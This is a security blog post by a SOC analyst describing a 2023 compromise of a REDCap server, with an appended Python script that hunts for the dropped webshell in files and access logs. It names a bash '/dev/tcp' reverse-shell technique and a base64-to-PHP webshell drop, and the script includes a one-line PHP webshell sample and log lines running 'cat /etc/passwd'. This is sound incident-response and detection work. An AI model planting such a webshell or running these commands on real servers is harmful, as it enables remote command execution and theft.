REDCap exploitation in 2023
Published 2026-06-20 02:27:07. Author: www.boredhackerblog.info

Intro

I saw the Google Threat Intelligence team's article regarding REDCap exploitation here: Public and Private Medical Community Targeted by China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, and National Defense Research - https://cloud.google.com/blog/topics/threat-intelligence/prc-targets-us-medical-research

"The earliest known compromise occurred in September 2023, after which GTIG observed a consistent operational pattern. The threat actor exploited externally facing REDCap (Research Electronic Data Capture) servers and deployed custom malware named INFINITERED to capture legitimate REDCap login credentials." - from the article

They also said the following: "GTIG was not able to confirm how UNC6508 initially gained access to the REDCap server."

This article caught my attention because I (technically, CrowdStrike generated the alert) saw REDCap getting exploited in 2023 as well, but it was different, and I never got closure on how it was exploited. I did a ton of searching online and read patch notes but never figured out how the exploitation may have happened.

The exploitation I saw was a bit different from what the Google Threat Intelligence group saw. I'm posting this to share what I saw.

Activity seen

This activity was observed in September 2023. 

CrowdStrike alerted on an Apache process spawning bash commands.

The Apache server was hosting the REDCap app. I'm unsure of the version.

One of the commands was a bash reverse shell using the bash -i >& /dev/tcp technique.

Searching the reverse shell destination IP turned up a report by Fortinet about the same IP exploiting a TeamCity vulnerability in 2023, with the actor potentially being APT29. (Just mentioning what I saw. I'm not doing attribution. I also know what the Pyramid of Pain is.)

Another command was executed as well: sh -c echo BASE64 | base64 -d | tee DIRECTORY/update.php

This wrote a basic PHP shell to disk, which took a GET request with "update_process" AND "cmd" parameters and executed commands via system().

(I kept watching VirusTotal for the file hash and content, expecting some web admin to find the file and upload it, but I have not seen this file get uploaded. Could be because it's easy to read and see it's just a simple webshell.)

Log review did not show any commands in URIs or provide clear info on how this exploitation could've happened.

This may have been done via a POST request, through some cookie values or headers, abuse of an existing compromise, or some other way. I have no idea. The software isn't open source, so there isn't anything further I could've done to research how the compromise happened.

In 2024, assuming that the threat actor exploited more REDCap instances the same way, I did some research. I did find multiple (maybe about 50) compromised REDCap instances, all over the world. Various REDCap versions were seen being hosted on various servers (Apache, nginx, etc.). It's always possible that an older version was exploited, then the victim updated, and I saw a compromised server with a different version.

Conclusion

Maybe check for a file named update.php with content "update_process" AND "cmd" on your REDCap server, or check web traffic logs for URIs containing update.php AND update_process AND cmd? I'd hope the file was detected and cleaned up by now since this happened in 2023.
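Both of those checks, written out as an added example (this is not the post's own tooling and not REDCap code). It assumes exactly what the post describes: a dropped file named update.php that takes "update_process" and "cmd" GET parameters and runs the command through system(), and an access log in Apache/nginx combined format. The sample webshell text and the log lines are constructed for illustration; the IPs are documentation ranges, not real indicators. The log scan decodes percent-encoded parameters so an encoded "cmd" is still caught, and it also reports POST requests to update.php, since the request body never reaches the access log and a URI-only review would miss it.

```python
"""Hunt for the update.php webshell described above.

Added example, not from the original post. Assumptions taken from the post:
the dropped file is named update.php, it accepts GET parameters
"update_process" and "cmd", and it runs the command through system().
Log parsing assumes Apache/nginx combined log format. All sample file
contents and log lines below are constructed for illustration.
"""
import os
import re
import tempfile
from urllib.parse import parse_qs, unquote, urlsplit

# Strings the post says the webshell contains; all three must be present.
WEBSHELL_MARKERS = ("update_process", "cmd", "system(")

# Combined log format: client ident authuser [time] "METHOD URI PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def looks_like_webshell(content: str) -> bool:
    """True when a file carries every marker from the post's description."""
    return all(marker in content for marker in WEBSHELL_MARKERS)


def find_webshells(root: str, filename: str = "update.php") -> list[str]:
    """Walk the web root and return paths of update.php files that match."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if filename not in files:
            continue
        path = os.path.join(dirpath, filename)
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                if looks_like_webshell(fh.read()):
                    hits.append(path)
        except OSError:
            # Unreadable file: skip it rather than abort the whole sweep.
            continue
    return hits


def scan_access_log(lines) -> list[dict]:
    """Return requests to update.php that carry the webshell's parameters.

    GET query strings are decoded so a percent-encoded "cmd" is still caught.
    POST requests to update.php are reported too, with cmd=None: the body is
    not in the access log, which is one reason a URI-only review can miss it.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("uri"))
        if not unquote(parts.path).lower().endswith("/update.php"):
            continue
        raw = parse_qs(parts.query, keep_blank_values=True)
        params = {unquote(k): v for k, v in raw.items()}
        method = m.group("method")
        if method == "POST" or ("update_process" in params and "cmd" in params):
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "method": method,
                "cmd": params["cmd"][0] if "cmd" in params else None,
            })
    return hits


# Constructed stand-in for the dropped file, following the post's description;
# this is NOT the actual sample from the incident.
FAKE_WEBSHELL = '<?php if (isset($_GET["update_process"])) { system($_GET["cmd"]); } ?>'
BENIGN_UPDATE = '<?php echo "nothing to see"; ?>'

# Constructed sample log lines (not real traffic); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Sep/2023:03:14:07 +0000] "GET /redcap/update.php?update_process=1&cmd=id HTTP/1.1" 200 57 "-" "curl/7.88.1"
198.51.100.7 - - [12/Sep/2023:03:15:22 +0000] "GET /redcap/index.php?pid=12 HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Sep/2023:03:16:01 +0000] "GET /redcap/update.php?update_process=1&%63md=cat%20/etc/passwd HTTP/1.1" 200 1120 "-" "curl/7.88.1"
203.0.113.5 - - [12/Sep/2023:03:17:45 +0000] "POST /redcap/update.php HTTP/1.1" 200 12 "-" "curl/7.88.1"
"""


def demo_find_webshells() -> list[str]:
    """Build a throwaway web root with one malicious and one benign update.php."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "redcap", "temp"))
        os.makedirs(os.path.join(root, "other"))
        with open(os.path.join(root, "redcap", "temp", "update.php"), "w") as fh:
            fh.write(FAKE_WEBSHELL)
        with open(os.path.join(root, "other", "update.php"), "w") as fh:
            fh.write(BENIGN_UPDATE)
        return [os.path.relpath(p, root).replace(os.sep, "/") for p in find_webshells(root)]


if __name__ == "__main__":
    print("files:", demo_find_webshells())
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print("log:", hit)
```

On a real server, point find_webshells at the web root (and anywhere the web server user can write, such as temp or upload directories) and feed scan_access_log the rotated access logs going back to at least September 2023. A POST hit with cmd=None is only a lead, not proof; confirm it against the file check or EDR process telemetry.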

I'd love to know more details about how the initial exploitation happened and what the attackers actually did afterwards.

At the end of the day, I'm just a SOC analyst with limited telemetry, and there is always another alert in the queue that needs to be worked... :(

Article source: http://www.boredhackerblog.info/2026/06/redcap-exploitation-in-2023.html